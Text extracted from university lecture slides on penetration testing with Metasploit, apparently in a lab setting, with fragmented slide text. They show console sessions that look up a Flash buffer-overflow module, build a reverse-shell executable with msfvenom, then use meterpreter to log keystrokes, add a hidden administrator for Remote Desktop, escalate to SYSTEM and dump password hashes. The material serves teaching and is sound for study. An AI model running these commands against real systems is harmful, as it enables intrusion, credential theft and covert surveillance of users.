Metasploit - asecuritysite.com · Metasploit x Understand how a Pen Tester can generate vulnerabilities and test using the Metasploit framework . x Define the options and …

Metasploit Understand how a Pen Tester can generate vulnerabilities and test

using the Metasploit framework.

Define the options and payloads required to generate and use

vulnerabilities.

Gaining remote access.

Prof Bill Buchananhttp://asecuritysite.com

@billatnapier

Author: Prof Bill Buchanan

Meta

sp

loit

Introduction

Vu

lne

rab

ility

Th

rea

ts


Pen Testing

Technical Scan

For Vulnerabilities

(eg NESSUS)

Business Scan for

Vulnerabilities

(eg Human)

White

HatWhite Hat

Adversarial Role

Social Engineering.

Password Cracking.

Data Theft.

Automated Testing

Port scanning.

Malware detection.

SQL Database Exploits.

Adverse Disclosure

Service Availability

Business

Disruption

Damage to or

Modification to

Assets

Fraud/E-Crime

Reputational

Damage

Legal and

Regulatory Censure

Risks

Malware

Hacking

Social

Misuse

Physical

Error

Environmental

Threats

Internal

External

Trusted Partner

Actor

Vuln

era

bili

tyT

hre

ats


Pen Testing

Technical Scan

For Vulnerabilities

(eg NESSUS)

Business Scan for

Vulnerabilities

(eg Human)

White

HatWhite Hat

Adversarial Role

Social Engineering.

Password Cracking.

Data Theft.

Adversarial Role

Denial of Service

User Account Breach

Password Cracking

Physical Attack

Database Breach

Email Breach

SNMP Breach

Malware Install

Web Comprise

Backdoor Install

Spyware Install

SCADA Compromise

VoIP Compromise

Cloud Compromise

Adverse Disclosure

Service Availability

Business Disruption

Damage/Modification of Assets

Fraud/E-Crime

Reputational Damage

Legal and Regulatory Censure

Risks

Vuln

era

bili

tyT

hre

ats

CVE-2014-0515


CVE-ID

CVE-2014-0515

Description

Buffer overflow in Adobe Flash Player

before 11.7.700.279 and 11.8.x through

13.0.x before 13.0.0.206 on Windows

and OS X, and before 11.2.202.356 on

Linux, allows remote attackers to

execute arbitrary code via unspecified

vectors, as exploited in the wild in April

2014.

Published: 2015

CVSS Severity: 9.3 (HIGH)

http://www.cve.mitre.org


Meta

sp

loit

Metasploit Framework

Runnin

g m

sfc

onsole

Me

tasplo

it


Metasploit

Vulnerability (CVE)

root@kali:~# msfconsole[*] Starting the Metasploit Framework console.../ _---------. .' ####### ;." .---,. ;@ @@`; .---,..." @@@@@'.,'@@ @@@@@',.'@@@@ ".'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @; `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .' "--'.@@@ -.@ @ ,'- .'--" ".@' ; @ @ `. ;' |@@@@ @@@ @ . ' @@@ @@ @@ , `.@@@@ @@ . ',@@ @ ; _____________ ( 3 C ) /|___ / Metasploit! \ ;@'. __*__,." \|--- \_____________/ '(.,...."/

Easy phishing: Set up email templates, landing pages and listenersin Metasploit Pro -- learn more on http://rapid7.com/metasploit

=[ metasploit v4.11.0-2014122301 [core:4.11.0.pre.2014122301 api:1.0.0]]+ -- --=[ 1388 exploits - 866 auxiliary - 236 post ]+ -- --=[ 342 payloads - 37 encoders - 8 nops ]+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]Msf >

Exploit generator Host under test

Vulnerability

Analysis

Generate

exploit

Runnin

g m

sfc

onsole

Me

tasplo

it


Metasploit

msf > search CVE-2014-0515

Matching Modules================

Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/browser/adobe_flash_pixel_bender_bof 2014-04-28 normal Adobe Flash Player Shader Buffer Overflow

msf > info exploit/windows/browser/adobe_flash_pixel_bender_bof Name: Adobe Flash Player Shader Buffer Overflow Module: exploit/windows/browser/adobe_flash_pixel_bender_bof Platform: Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Normal Disclosed: 2014-04-28

Available targets: Id Name -- ---- 0 Automatic

Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- Retries false no Allow the browser to retry the module SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate URIPATH no The URI to use for this exploit (default is random)

Payload information: Space: 2000

Description: This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13 over Windows XP SP3, Windows 7 SP1 and Windows 8.

References: http://cvedetails.com/cve/2014-0515/

Ru

nn

ing m

sfc

on

so

leM

eta

splo

it


Metasploit

root@kali:~# msfvenom -p windows/shell_reverse_tcp LHOST=10.200.0.208 LPORT=4444 -f exe > winexp.exe

msf > use exploit/multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 10.200.0.208LHOST => 10.200.0.208msf exploit(handler) > set LPORT 4444LPORT => 4444msf exploit(handler) > exploit

[*] Started reverse handler on 10.200.0.208:4444 [*] Starting the payload handler...[*] Sending stage (770048 bytes) to 10.200.0.205[*] Meterpreter session 1 opened (10.200.0.208:4444 -> 10.200.0.205:49265) at 2015-01-01 16:54:07 -0500

WINEXP.EXE

Gain

ing A

dm

in a

ccess

Me

tasplo

it


Metasploit


meterpreter > keyscan_startStarting the keystroke sniffer...meterpreter > keyscan_dumpDumping captured keystrokes...hel <Ctrl> <LCtrl> meterpreter > keyscan_stop

meterpreter > execute -f calc.exeProcess 3780 created.

meterpreter > screenshotScreenshot saved to: /root/zJVqTTaq.jpeg

meterpreter > getuidServer username: Encase-PC1\Encase

meterpreter > sysinfoComputer : ENCASE-PC1OS : Windows 7 (Build 7601, Service Pack 1).Architecture : x64 (Current Process is WOW64)System Language : en_GBMeterpreter : x86/win32

meterpreter > getsidServer SID: S-1-5-21-3026846657-1272420173-2154099446-1000

meterpreter > ifconfigInterface 13============Name : Intel(R) PRO/1000 MT Network ConnectionHardware MAC : 00:50:56:ab:68:00MTU : 1500IPv4 Address : 10.200.0.205IPv4 Netmask : 255.255.255.0

WINEXP.EXE

Rem

ote

Deskto

pM

eta

splo

it


Metasploit


meterpreter > run getgui -u newuser -p pass[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator[*] Carlos Perez [email protected][*] Setting user account for logon[*] Adding User: hacker with Password: s3cr3t[*] Hiding user from Windows Login screen[*] Adding User: hacker to local group 'Remote Desktop Users'[*] Adding User: hacker to local group 'Administrators'[*] You can now login with the created user[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150101.4028.rc

meterpreter > run getgui -e

[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator[*] Carlos Perez [email protected][*] Enabling Remote Desktop[*] RDP is disabled; enabling it ...[*] Setting Terminal Services service startup mode[*] The Terminal Services service is not set to auto, changing it to auto ...[*] Opening port in local firewall if necessary[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150101.4353.rc

0.200.0.205 - Meterpreter session 3 closed. Reason: User exitmsf exploit(handler) > exit

root@kali:~# rdesktop -u newuser -p pass 10.200.0.205WARNING: Remote desktop does not support colour depth 24; falling back to 16

WINEXP.EXE

Gain

ing A

dm

in a

ccess

Meta

splo

it


Metasploit


meterpreter > hashdump[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.meterpreter > getuidServer username: Encase-PC1\Encase

meterpreter > ps

Process List============

PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4294967295 4 0 System x86_64 0 264 4 smss.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe 364 524 svchost.exe x86_64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 372 364 csrss.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe 388 524 spoolsv.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe 420 364 wininit.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe 524 420 services.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe 532 420 lsass.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe 540 420 lsm.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe 632 524 svchost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe

708 524 svchost.exe x86_64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 788 524 svchost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 832 524 svchost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 856 524 svchost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe

meterpreter > migrate 832[*] Migrating from 2436 to 832...[*] Migration completed successfully.meterpreter > getuidServer username: NT AUTHORITY\SYSTEMmeterpreter > hashdumpAdministrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Encase:1000:aad3b435b51404eeaad3b435b51404ee:307e40814e7d4e103f6a69b04ea78f3d:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

WINEXP.EXE

Metasploit Understand how a Pen Tester can generate vulnerabilities and test

using the Metasploit framework.

Define the options and payloads required to generate and use

vulnerabilities.

Understand how to test a range of devices/instances.

Using shells and callbacks.

Prof Bill Buchananhttp://asecuritysite.com

@billatnapier

Metasploit - asecuritysite.com · Metasploit x Understand how a Pen Tester can generate vulnerabilities and test using the Metasploit framework . x Define the options and …

Documents